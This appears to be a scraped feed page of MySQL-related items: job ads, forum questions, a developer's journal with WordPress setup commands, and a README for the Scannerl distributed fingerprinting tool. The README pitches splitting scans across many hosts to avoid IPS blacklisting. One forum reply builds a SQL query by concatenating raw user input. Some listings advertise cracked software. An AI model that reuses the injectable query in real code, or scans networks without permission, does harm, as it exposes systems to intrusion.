Next Page: 10000

          Percona Live 2012 – The Etsy Shard Architecture      Cache   Translate Page      
I attended Percona Conf in Santa Clara last week. It was a great 3 days of lots of people dropping expert MySQL knowledge. I learned a lot and met some great people. I gave a talk about the Etsy shard architecture, and had a lot of good feedback and questions. A lot of people do […]
          Distributed MySQL Sleuthing on the Wire      Cache   Translate Page      
Intro Oftentimes you need to know what MySQL is doing right now and furthermore if you are handling heavy traffic you probably have multiple instances of it running across many nodes. I’m going to start by showing how to take a tcpdump capture on one node, a few ways to analyze that, and then go […]
          WHMCS Module Development - 2      Cache   Translate Page      
We are looking for a WHMCS Module developer to drive forward future versions of our WHMCS module. This work is regular, we aim to release new versions every three months and the successful person will have the option to complete all of the future work on the module... (Budget: £5 - £10 GBP, Jobs: HTML, Linux, MySQL, PHP, WHMCS)
          Online digital ebook library      Cache   Translate Page      
I have some manuals i would like to upload on my web server as .pdf and allow access to them by reading them online. (Budget: $30 - $250 USD, Jobs: CMS, CSS, HTML, MySQL, PHP)
          Desarrollo web + desarrollo de escritorio      Cache   Translate Page      
Se necesita el desarrollo en java de un sistema de llamado de personas. Se deberan utilizar patrones y estructuras pre establecidas. Se utilzará MySQL y Tomcat. Se deberá documentar la solución y utilizar... (Budget: $10 - $30 USD, Jobs: Java, MySQL, PHP, Software Architecture, Website Management)
          Web development      Cache   Translate Page      
I need my website re-configured. I have some sites built with Ruby. Need help with updates. (Budget: $750 - $1500 USD, Jobs: MySQL, Shopify, System Admin, WordPress)
          Consultar y validar antes de insertar datos de un array en la base de datos      Cache   Translate Page      

Consultar y validar antes de insertar datos de un array en la base de datos

Respuesta a Consultar y validar antes de insertar datos de un array en la base de datos

//sacamos el id del proximo tag $result = mysqli_query($conexion, "SHOW TABLE STATUS WHERE `Name` = 'tags '"); $data = mysqli_fetch_assoc($result); $Proximo_id = $data['Auto_increment'];
con esto puedes saber cual es el id que sigue en tu tabla de tags yo lo uso para saber cual es la proxima id de tabla de publicaciones para una ves de crearla me direccione a ella...

Publicado el 06 de Noviembre del 2018 por Yoangel Eizaga

          Insert Automaticos a Clientes      Cache   Translate Page      

Insert Automaticos a Clientes

Respuesta a Insert Automaticos a Clientes

Hola. Gracias por contestar.

El valor del pago, esta en una tabla aparte llamada servicios, esos se agregarían manualmente, despues.

Si es variante mysql.

Los clientes van aumentando con el tiempo.
ahorita son 1000 después 1001,1002...

No se si explicarme, soy mul malo para explicar jje.


Tengo 4 clientes(por ahora, van ir aumentando), va pedro y paga, se registra su pago mes de enero. (se paga cada 1 de ...

Publicado el 06 de Noviembre del 2018 por alejandro

          parametros en php 7      Cache   Translate Page      

parametros en php 7

Respuesta a parametros en php 7

le puse mysqli aun me mrca error

Publicado el 06 de Noviembre del 2018 por elsy

          Telecommute WordPress Support Superhero      Cache   Translate Page      
A web design company is filling a position for a Telecommute WordPress Support Superhero. Core Responsibilities of this position include: Supporting our awesome members and customers Assisting with and solving all manner of WordPress questions, with style Coordinating with developers over bugs, features and cool new stuff Required Skills: A really good familiarity with WordPress Keen on working in an expanding, motivated, distributed support team Love impressive response times, typing speed and the ability to really bang good stuff out Ability to code (PHP/MySQL and/or HTML/CSS) a bit, or a lot, even better
          Telecommute Front End Software Engineer      Cache   Translate Page      
A staffing company is searching for a person to fill their position for a Telecommute Front End Software Engineer. Individual must be able to fulfill the following responsibilities: Using front-end development technology Willingness to embrace the concept of iterative development Embracing the concept of iterative development Qualifications Include: 2+ years experience in writing unit tests 1+ years experience working in an environment where CI/ CD tools are used 2+ years of experience as a hands-on software engineer At least 1 year of working experience using cloud services such as AWS Bachelor's Degree in Computer Science, Electrical Engineering, or Computer Engineering Database knowledge in technology such as SQL Server / Oracle / MySQL / MongoDB / Cassandra, etc
          Telecommute Database Engineer      Cache   Translate Page      
A staffing agency has a current position open for a Telecommute Database Engineer. Individual must be able to fulfill the following responsibilities: Working with teams to resolve production issues, troubleshooting symptoms and more Evaluating all monitoring alerts; differentiating between valid and false positive alerts Following documented processes for troubleshooting, recovery, and service restoration processes Required Skills: Bachelor’s Degree in Computer Science, Electrical Engineering, or Computer Engineering 2+ years of experience as a hands-on database developer/administrator 1+ years of practical work experience using cloud services such as AWS Exposure to at least one of the databases - Oracle / MSSQL / MySQL Good knowledge of monitoring and tuning databases to provide high availability service Good knowledge of database backup and recovery, export/import, tools and techniques
          App-MysqlUtils-0.012 : Perlancar      Cache   Translate Page      
Perlancar uploaded P/PE/PERLANCAR/App-MysqlUtils-0.012.tar.gz (27k) on 06 Nov 2018
          PHP Screen scraping, save to MYSQL DB      Cache   Translate Page      
PHP Screen scraping, save to MYSQL DB, will need to work closely with me. (Budget: $30 - $250 USD, Jobs: MySQL, PHP)
          Conecte e gerencie servidores SSH e MySQL com o Guake Indicator      Cache   Translate Page      
Conecte e gerencie servidores SSH e MySQL com o Guake Indicator

Se você precisa conectar constantemente a servidores SSH e MySQL, instale e use o Guake Indicator em seu Ubuntu.

Leia o restante do texto "Conecte e gerencie servidores SSH e MySQL com o Guake Indicator"

O post Conecte e gerencie servidores SSH e MySQL com o Guake Indicator apareceu primeiro em Blog do Edivaldo.


          Reply To: Search form for entries      Cache   Translate Page      

Thank you Marcel. I’m just a good copypaster 😀 but I know I should try to follow your suggestion.
In the meanwhile, I’ve changed the search query, using the natural language search in mysql
So I added a fulltext index to the guestbook entries table and used this query:

SELECT id, author_id, author_name, content FROM wp_gwolle_gb_entries WHERE MATCH (author_name, content) AGAINST (‘”.$str.”*’ IN BOOLEAN MODE)

This made my day. And in fact it’s midnight here 😀


          Free Online Database Diagram Maker with Sharing, Export as SQL, PDF      Cache   Translate Page      

This article covers a free online database diagram maker tool. With this tool, you can quickly make SQL database diagrams and export as MySQL, PNG & PDF.

The post Free Online Database Diagram Maker with Sharing, Export as SQL, PDF appeared first on I Love Free Software.


          Technical Architect - Data Solutions - CDW - Milwaukee, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Milwaukee, WI jobs
          Technical Architect - Data Solutions - CDW - Madison, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Madison, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page      
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sun, 28 Oct 2018 21:34:20 GMT - View all Bellevue, WA jobs
          Functional Tester (Home-based)      Cache   Translate Page      
Functional Testers with 2-4 years of related experience. Task and Responsibilities 1. Develop Test Cases and Test Scripts 2. Execute Test Cases 3. Analyze test results and report defects 4. Interact and Collaborate with Development Team 5. Send Test Progress report to Test Lead Technical Skills 1. Functional Testing 2. System Integration Testing 3. Regression Testing 4. Test Case Analysis 5. Familiar with MySQL, PHP, JIRA, Payment Systems, Scheduling Systems 6. Web Application testing is required 7. Mobile testing is a plus
          Solutions Architect/Senior Developer      Cache   Translate Page      
Job Description Solutions Architect/Senior Developer to work on bespoke customer specific development projects based on market leading technologies within a busy custom solutions development team. Building key relationships with SI Practice, Professional Services and Sales teams internally, as well as our valued customers externally. Main Responsibilities Undertake development projects requiring the use of market leading technologies: HTML, Javascript, various leading frameworks, ASP.NET, C#, Styling Languages, Developer tools Undertake the installation, configuration and development requirements of web development projects dependant on demand and skills Effective and regular communication with clients and management Work on client sites, Advanced offices and home Gathering requirements and writing proposals User and system documentation Project management Qualifications • Bachelor Degree in Computing or related subject or relevant commercial experience • IT qualifications (advantageous) • Strong communication skills, written and spoken • Well-presented and good interpersonal skills Experience Essential • Web development - HTML, HTML5, Javascript, AJAX, CSS etc. • At least 5 years .NET/C# development inc Visual Studio • Microsoft SQL Server and related market leading technologies • Relevant experience in a similar role Preferred • Microsoft Sharepoint • SQL Server - SSIS, SSRS Relevant • Mobile development - Xamarin, OSX, iOS, Android, Mobile Frameworks Phonegap, JQuery Mobile • IDEs - Eclipse, XCode • Databases - Oracle, MySQL, PostgreSQL • Application Servers - JBOSS, Tomcat, IIS • XML – XML schema, XQuery, XSLT, XPath • Build - SVN, CVS, Mercurial, ANT, GitHub, Competencies • ‘Can-do’ pro-active attitude • Attention to detail – focus on quality • Able to analyse business requirements effectively • Creativity and Innovation in designing solutions • Teamwork – able to work effectively as part of a team or independently • Coaching – self-development. Willing and able to learn new skills • Drive for Achievement – keen to progress • Initiative - project ownership • Resilience • Customer Service Orientation Join the Team Some of our Key Benefits are: Excellent benefits from day one: 25 days holidays + opportunity to buy or sell up to 5 days contributory pension life insurance income protection insurance childcare voucher salary sacrifice cycle to work schem, employee assistance programme Special focus on training and development with the opportunity to excel your career from our internal Talent Development Team Be part of an organisation that has recently been ranked by Deloitte in the Top 50 fastest growing Tech Companies Advanced are an equal opportunity employer, committed to removing bias from the hiring process. We hire for potential and develop at pace. If successful, you can expect to take an online assessment, meet the HR team and attend a final interview. Click apply now, and a member of our in-house talent acquisition team will be in touch!
          How can I add mysqli result set to another array      Cache   Translate Page      

@programmer wrote:

Am trying to put mysqli result set into an array for later use and this is how I did it(but is not working)

$split = [];
   $sql_money = "SELECT j_id, amount_invested FROM j_members WHERE j_activated = 1 LIMIT 5";
   $result_money = mysqli_query($conn, $sql_money);
   while($data = mysqli_fetch_assoc($result_money)){
       $split[] = ['id' => $data['j_id'], 'invest' => $data['amount_invested']];
      //echo $data['j_id'];
   }
   
   foreach($split as $s){
       echo $s['id'] . '<br>';
   }

Who can put me through

Posts: 4

Participants: 4

Read full topic


          Need load balance paypal button      Cache   Translate Page      
Need a paypal button that says, "Load Balance" and a input to put how much the user wants to load his balance with and when it is clicked it will have the user login to paypal and complete the transaction... (Budget: $30 - $250 USD, Jobs: HTML, Javascript, MySQL, PHP, Website Design)
          small Java program -- 2      Cache   Translate Page      
I have a simple java program that reads data from a local database (SQL) and it prints the columns of a certain table. I want to upgrade that program to make it prints that information to pdf and HTML files using Pandoc... (Budget: $10 - $30 USD, Jobs: Java, Javascript, MySQL, PHP, Software Architecture)
          eCommerce webpage to sell digital download data extracted from a MySql database      Cache   Translate Page      
I have a MySQL database that has data where a primary key by postcode. I would like to allow users to search that database (from a front end webpage) by postcode and display for them, the total number of records (just a summary count of the records..... (Budget: $30 - $250 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
           [MySQL][PHP] wypisanie postów wg własnej kolejności       Cache   Translate Page      
none
          Needed Web Scrapping Developer      Cache   Translate Page      
This project are long term process, no deadline, Ongoing project! no budget limits! immediately effect! My company have a number of student record around 400 that need to enrol in different University... (Budget: $250 - $750 USD, Jobs: Database Programming, Java, MySQL, Software Architecture, Web Scraping)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Matomo v3.6.1 - Скрипт веб-аналитики      Cache   Translate Page      
Matomo - это система веб-аналитики с открытым исходным кодом, созданная веб-разработчиками со всего мира. Matomo устанавливается на веб-сервере и работает на PHP / MySQL. Сегодня Matomo используется на более чем 1 000 000 сайтов. Matomo стремится стать полноценной бесплатной, открытой и независимой альтернативой Google Analytics в мире и, в частности, Yandex. Метрики в России.
          Tip: Know if LIKE Results are True or False      Cache   Translate Page      
See if LIKE results are true or false in MySQL.
          PHP Codeignitor Expert Required -- 3      Cache   Translate Page      
*** BID WITH YOUR ACTUAL BUDGET & TIME ELSE I WILL REPORT YOU************ I already have a system developed & you need to make the following changes in it: 1. Users with different privileges & roles... (Budget: $30 - $250 AUD, Jobs: Codeigniter, MySQL, PHP, Software Architecture, Website Management)
          Azure SQL Database and Azure Database for MySQL at PASS SUMMIT!      Cache   Translate Page      
Get inspired by our industry-leading keynote speakers on the Microsoft data platform at PASS Summit 2018! There has never been a more exciting time for data professionals and developers as more organizations turn to data-driven insights to stay ahead and prepare for the future.
          Best practices for alerting on metrics with Azure Database for MySQL monitoring      Cache   Translate Page      
Whether you are a developer, database administrator, site reliability engineer, or a DevOps professional at your company, monitoring databases is an important part of maintaining the reliability, availability, and performance of your PostgreSQL server.
          Comment on Contact by Audry Francillon      Cache   Translate Page      
Last month, when i visited your blog i got an error on the mysql server of yours..-~’~
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Journal, ISO week 2018-W44      Cache   Translate Page      

last week

Gaming time

Over a month ago I decided to make some changes that were intended to reduce the amount of time I waste on time-demanding (and perhaps not so enjoyable) games. This week I took a few minutes to see how I've been getting on.

The time I spent playing games (I think this is all time-sucking games with a few minutes here and there - I haven't played a "proper" computer game in ages) over the last few months:

July: 11 hours, 46 minutes August: 13 hours, 18 minutes September: 9 hours, 10 minutes (changes made towards the end) October: 4 hours, 49 minutes

So it's gone down, by quite a lot. But I still spent nearly 5 hours chasing time limited bonuses, taking part in time limited contests and recharging/rebuilding some numbers in a database!

I want to get back to gaming that builds reactions and skills (yes, they might only be skills at a game but it's better than repeated drudgery where you inevitably do better because you've upgraded things - a few minutes here and there really not being enough to build a skill anyway). Or maybe even gaming with other real people who you can speak to afterwards!

Exhausting meetings

Another week with a lot of time spent in phone and physical meetings. These seem to take so much energy, especially the physical meetings - I'm always exhausted by the time I get back. The meetings were mostly for consultancy clients this week and they've come with a lot of required background thinking and planning, which probably hasn't helped my feeling of tiredness. Unfortunately it also means there's going to be a lot of writing in next weeks schedule.

php (WordPress) development environment

I don't do much in PHP but this week I've ended up building two development/testing environments for WordPress related things.

One was just for a one-time test to work out how (if) a data migration from Magento to Woocommerce would work. For this I used the super simple Scotch Box which provided all the basics. Then I copied over a couple of databases (with mysqldump, etc) and copied the website files - that was it, a working and easily disposable testing environment. The Magento to Woocommerce migration seemed to work quite well too!

The second environment was for actual, and ongoing, development. My PaTMa blog is using WordPress and I'm working on a custom theme so that I can make it more consistent with the application site. Then my intention is to also use WordPress for the marketing site for PaTMa, leaving just the actual application as a Django based bespoke site. I've previously played with the Vagrant approach for this too, but it felt a bit heavier/slower than I wanted. Thankfully it didn't take long to find (be reminded of really) PHP's built-in web server , work out a few PHP dependencies (I already have MySQL installed on my main dev machine) and make use of the excellent WP-CLI to make an empty WordPress site all ready for some theme development.

In case it's useful to anyone, here's what I actually did:

sudo apt install php7.2-cli php-mysql curl https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar -o wp chmod +x wp mkdir test-wp cd test-wp ../wp core download ../wp core config --dbname=test_wp --dbuser=root --dbpass=root --dbhost=localhost ../wp db create ../wp core install --url=http://localhost:8000 --title=Test --admin_user=admin --admin_password=password --admin_email=admin@example.com php -S localhost:8000

Then point a browser at http://localhost:8000/ to see a basic, default WordPress site.

One final step for me was linking my development theme into this new WordPress install:

cd wp-content/themes ln -s ../../../my-theme

I then logged in as admin and activated my development theme, all ready for work.

Bricks and Blocks

Saturday included a visit to a Bricks and Blocks event that the local scout group ran. I was quite surprised by how large the event was; there were a lot of great things on display including an infinite (ie circular) ball-run made entirely from Lego and a Robot Wars stall. The Robot Wars display included several full size robots, including one being demo'd; plus a mini arena with mini robots for the "children" to try out. The range of Lego was also impressive with all sorts from town to Star Wars to the new Harry Potter. Even the ancient Fabuland had a stall, much to the delight of our youngest (who's a fan of some Fabuland books I still have).

Uneventful budget

Having set aside my Monday afternoon to watch the budget - so I could react quickly and get any changes required for the buy-to-let profit calculations , I was quite pleased it was pretty bored, especially on the landlord and property front.

Property

I had a great chat with Susannah Cole from The Good Property Company - some fantastic insights.


          Is it possible to bundle/ship PHP+MySQL in standalone executable?      Cache   Translate Page      

I am trying to create an application that has a sender and receiver. The entire application is only meant to be used on a LAN and can also possibly be done almost completely through the browser.

The "sender" part is an application of some sort that will need to run a local server on the person's computer and allow for php,html,css,js, and mysql to run.

On the "receiver" end, it is simply a person's browser accessing a webpage being served up from the "sender" application.

I have been looking into nodejs as a means of accomplishing the server part of this...but I am not sure if I can ship it as an exe with mysql and php installed and allow it to be execd from php. I am aware of being able to install these extensions using npm, but I want to ship a whole exe to the end user and not have them install node on their own.

Is this possible? If so, how? Thanks in advance.


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Technical Architect - Data Solutions - CDW - Milwaukee, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Milwaukee, WI jobs
          Technical Architect - Data Solutions - CDW - Madison, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Madison, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page      
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sun, 28 Oct 2018 21:34:20 GMT - View all Bellevue, WA jobs
          #8: Learning PHP, MySQL & JavaScript: With jQuery, CSS & HTML5      Cache   Translate Page      
Learning PHP, MySQL & JavaScript
Learning PHP, MySQL & JavaScript: With jQuery, CSS & HTML5
Robin Nixon

Buy new: CDN$ 64.65 CDN$ 45.81
50 used & new from CDN$ 45.61

(Visit the Bestsellers in Web Development list for authoritative information on this product's current rank.)
          PHP/CodeIgniter programmer needed      Cache   Translate Page      
Toronto-based startup firm is looking for a PHP/LAMP developer with a guaranteed minimum workload of 20 hours per week. The candidate must have prior work experience with CodeIgniter framework. The candidate must be able to communicate in English over Skype... (Budget: $15 - $25 CAD, Jobs: Bootstrap, Codeigniter, jQuery / Prototype, MySQL, PHP)
          Virtual coin Bustabit      Cache   Translate Page      
I am looking for someone to build a Korean-style bustabit game. It use virtual money(or point) to bet. not use Bitcoin. It must develop on this env. 1. PHP(higher then 7.x) + Javascript + HTML + CSS client (using PC and mobile) 2... (Budget: $750 - $1500 USD, Jobs: HTML, MySQL, PHP, Software Architecture, Website Design)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          PHP/CodeIgniter programmer needed      Cache   Translate Page      
Toronto-based startup firm is looking for a PHP/LAMP developer with a guaranteed minimum workload of 20 hours per week. The candidate must have prior work experience with CodeIgniter framework. The candidate must be able to communicate in English Looking for a dedicated and motivated individual... (Budget: $15 - $25 CAD, Jobs: Bootstrap, Codeigniter, jQuery / Prototype, MySQL, PHP)
          Are queries made on a shared host, done per account or across all accounts ?      Cache   Translate Page      
I just wondered if anyone knows of a site that can give me more information on the way MySQL actually processes the queries made from any account on the server. What I am wanting to know is, if a server has multiple sites are the queries processed in strick order for each account or across all...
          SQLPro for Postgres 1.0.302 Mac 破解版 – PostgreSQL数据库管理客户端      Cache   Translate Page      
SQLPro for Postgres是一款Mac上优秀的数据库客户端,支持Postgres, MySQL,Microsoft SQL Server,Oracle等主流数据库,可以方便易用的管理数据库,很不错!
          Navicat for MySQL 12.0.28 Mac 破解版 – 数据库管理和开发工具      Cache   Translate Page      
Navicat for MySQL for Mac是Mac平台上专业的数据库管理和开发工具,navicat for MySQL mac破解版支持创建数据模型、导入/导出数据、备份、传输数据库等功能,还提供了全功能的图形管理器。
          SQLPro for MySQL 1.0.302 破解版 – 优秀的MySQL客户端      Cache   Translate Page      
SQLPro for MySQL 是一款Mac上优秀的MySQL客户端,方便和快速的连接到MySQL数据库,图形界面,支持多种主题,代码高亮,语句查询等!
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Programador Júnior/Pleno – Pretensão Salarial – Centro RJ – 4 vagas      Cache   Translate Page      
Cargo: PROGRAMADOR JÚNIOR E PLENO Regime de Contratação: CLT – Efetivo Número de Vagas: 4 Descrição do Cargo / Responsabilidades: Experiências: Angular, .net core, C#, Webapi, Sql server, Mysql; Asp.Net, Visual Basic .Net, Sql server. Formação e Experiências Requeridas: Leia mais...
          Preciso de Programador/Designer Gráfico (pode nao ser designer) para server FiveM (Base VRP) Se quiser pode ficar tempo integral      Cache   Translate Page      
Preciso de programador que também é designer gráfico para corrigir alguns bugs, implementar scripts e mods, base VRP, host br, ter conhecimento sobre como mexer em base VRP para FiveM. (Budget: $30 - $250 USD, Jobs: HTML5, Lua, MySQL, Scripting)
          Javaspring Backend and Frontend Development -- 2      Cache   Translate Page      
We are building a web application server that contains real-time MongoDB, local SQL, Java, Javaspring, and NodeJS. We would like to have a developer who has these skills and willing to work on As Needed... (Budget: $250 - $750 USD, Jobs: Angular.js, Java, MySQL, node.js, NoSQL Couch & Mongo)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Azure SQL Database and Azure Database for MySQL at PASS SUMMIT!      Cache   Translate Page      
Get inspired by our industry-leading keynote speakers on the Microsoft data platform at PASS Summit 2018! There has never been a more exciting time for data professionals and developers as more organizations turn to data-driven insights to stay ahead and prepare for the future.
          Best practices for alerting on metrics with Azure Database for MySQL monitoring      Cache   Translate Page      
Whether you are a developer, database administrator, site reliability engineer, or a DevOps professional at your company, monitoring databases is an important part of maintaining the reliability, availability, and performance of your PostgreSQL server.
          #10: Learning PHP, MySQL & JavaScript: With jQuery, CSS & HTML5      Cache   Translate Page      
Learning PHP, MySQL & JavaScript
Learning PHP, MySQL & JavaScript: With jQuery, CSS & HTML5
Robin Nixon

Buy new: CDN$ 64.65 CDN$ 45.81
50 used & new from CDN$ 45.61

(Visit the Bestsellers in Web Development list for authoritative information on this product's current rank.)
          Portfolio In PDF & Email SMS Phase 2      Cache   Translate Page      
There are four pages which needs to be designed / built Admin for email SMS (Over the Phase 1 already built) Admin for Portfolio in PDF Front end page of PDF Front end Page of Email SMS (Over the Phase... (Budget: ₹12500 - ₹37500 INR, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Scannerl - The Modular Distributed Fingerprinting Engine      Cache   Translate Page      

Scannerl is a modular distributed fingerprinting engine implemented by Kudelski Security. Scannerl can fingerprint thousands of targets on a single host, but can just as easily be distributed across multiple hosts. Scannerl is to fingerprinting what zmap is to port scanning.
Scannerl works on Debian/Ubuntu/Arch (but will probably work on other distributions as well). It uses a master/slave architecture where the master node will distribute the work (host(s) to fingerprint) to its slaves (local or remote). The entire deployment is transparent to the user.

Why use Scannerl
When using conventional fingerprinting tools for large-scale analysis, security researchers will often hit two limitations: first, these tools are typically built for scanning comparatively few hosts at a time and are inappropriate for large ranges of IP addresses. Second, if large range of IP addresses protected by IPS devices are being fingerprinted, the probability of being blacklisted is higher what could lead to an incomplete set of information. Scannerl is designed to circumvent these limitations, not only by providing the ability to fingerprint multiple hosts simultaneously, but also by distributing the load across an arbitrary number of hosts. Scannerl also makes the distribution of these tasks completely transparent, which makes setup and maintenance of large-scale fingerprinting projects trivial; this allows to focus on the analyses rather than the herculean task of managing and distributing fingerprinting processes by hand. In addition to the speed factor, scannerl has been designed to allow to easily set up specific fingerprinting analyses in a few lines of code. Not only is the creation of a fingerprinting cluster easy to set up, but it can be tweaked by adding fine-tuned scans to your fingerprinting campaigns.
It is the fastest tool to perform large scale fingerprinting campaigns.
For more:

Installation
See the different installation options under wiki installation page
To install from source, first install Erlang (at least v.18) by choosing the right packaging for your platform: Erlang downloads
Install the required packages:
# on debian
$ sudo apt install erlang erlang-src rebar

# on arch
$ sudo pacman -S erlang-nox rebar
Then build scannerl:
$ git clone https://github.com/kudelskisecurity/scannerl.git
$ cd scannerl
$ ./build.sh
Get the usage by running
$ ./scannerl -h
Scannerl is available on aur for arch linux users
DEBs (Ubuntu, Debian) are available in the releases.
RPMs (Opensuse, Centos, Redhat) are available under https://build.opensuse.org/package/show/home:chapeaurouge/scannerl.

Distributed setup
Two types of nodes are needed to perform a distributed scan:
  • Master node: this is where scannerl's binary is run
  • Slave node(s): this is where scannerl will connect to distribute all its work
The master node needs to have scannerl installed and compiled while the slave node(s) only needs Erlang to be installed. The entire setup is transparent and done automatically by the master node.
Requirements for a distributed scan:
  • All hosts have the same version of Erlang installed
  • All hosts are able to connect to each other using SSH public key
  • All hosts' names resolve (use /etc/hosts if no proper DNS is setup)
  • All hosts have the same Erlang security cookie
  • All hosts must allow connection to Erlang EPMD port (TCP/4369)
  • All hosts have the following range of ports opened: TCP/11100 to TCP/11100 + number-of-slaves

Usage
$ ./scannerl -h
____ ____ _ _ _ _ _ _____ ____ _
/ ___| / ___| / \ | \ | | \ | | ____| _ \| |
\___ \| | / _ \ | \| | \| | _| | |_) | |
___) | |___ / ___ \| |\ | |\ | |___| _ <| |___
|____/ \____/_/ \_\_| \_|_| \_|_____|_| \_\_____|

USAGE
scannerl MODULE TARGETS [NODES] [OPTIONS]

MODULE:
-m <mod> --module <mod>
mod: the fingerprinting module to use.
arguments are separated with a colon.

TARGETS:
-f <target> --target <target>
target: a list of target separated by a comma.
-F <path> --target-file <path>
path: the path of the file containing one target per line.
-d <domain> --domain <domain>
domain: a list of domains separated by a comma.
-D <path> --domain-file <path>
path: the path of the file containing one domain per line.

NODES:
-s <node> --slave <node>
node: a list of node (hostnames not IPs) separated by a comma.
-S <path> --slave-file <path>
path: the path of the file containing one node per line.
a node can also be supplied with a multiplier (<node>*<nb>).

OPTIONS:
-o <mod> --output <mod> comma separated list of output module(s) to use.
-p <port> --port <port> the port to fingerprint.
-t <sec> --timeout <sec> the fingerprinting process timeout.
-T <sec> --stimeout <sec> slave connection timeout (default: 10).
-j <nb> --max-pkt <nb> max pkt to receive (int or "infinity").
-r <nb> --retry <nb> retry counter (default: 0).
-c <cidr> --prefix <cidr> sub-divide range with prefix > cidr (default: 24).
-M <port> --message <port> port to listen for message (default: 57005).
-P <nb> --process <nb> max simultaneous process per node (default: 28232).
-Q <nb> --queue <nb> max nb unprocessed results in queue (default: infinity).
-C <path> --config <path> read arguments from file, one per line.
-O <mode> --outmode <mode> 0: on Master, 1: on slave, >1: on broker (default: 0).
-v <val> --verbose <val> be verbose (0 <= int <= 255).
-K <opt> --socket <opt> comma separated socket option (key[:value]).
-l --list-modules list available fp/out modules.
-V --list-debug list available debug options.
-A --print-args Output the args record.
-X --priv-ports use only source port between 1 and 1024.
-N --nosafe keep going even if some slaves fail to start.
-w --www DNS will try for www.<domain>.
-b --progress show progress.
-x --dryrun dry run.
